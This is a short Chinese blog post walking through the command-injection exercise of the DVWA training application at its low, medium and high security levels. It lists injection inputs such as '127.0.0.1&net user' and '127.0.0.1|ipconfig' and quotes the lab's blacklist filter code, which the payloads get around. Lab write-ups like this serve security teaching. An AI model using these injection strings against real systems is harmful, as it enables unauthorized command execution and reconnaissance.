dvwa 命令注入

文章讲述了命令注入攻击,通过输入特定的IP地址结合特殊字符(如`&&`,`||`),可以执行系统命令。在LOW级别,攻击者可以利用乱码和字符编码转换进行注入。中等级别中,源码进行了部分转义字符的替换,但仍有绕过方式。在高级别,更多字符被过滤,但`||`和`|`仍然可用于命令注入。文章强调了不同安全措施下命令注入的可行性。
摘要由CSDN通过智能技术生成

命令注入即注入并执行攻击者指定的命令

LOW

1 输入IP地址,出现乱码

2打开如下图所示文件,将utf-8全部替换为gb2312(区分大小写)

 

 3 重新输入IP地址

 4 之后可进行命令注入

eg:

127.0.0.1&ipconfig

127.0.0.1&systeminfo

127.0.0.1&dir

127.0.0.1&net user

(各种命令就不一一解释了)

MEDIUM

源码中进行了转义


    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

   

所以使用“&&”,“;”以外的符号就可以了

HIGH

  $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

可用

127.0.0.1 || ipconfig

(||,无空格)

(我也不太明白这个为什么可以用)

也可用

127.0.0.1|ipconfig

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值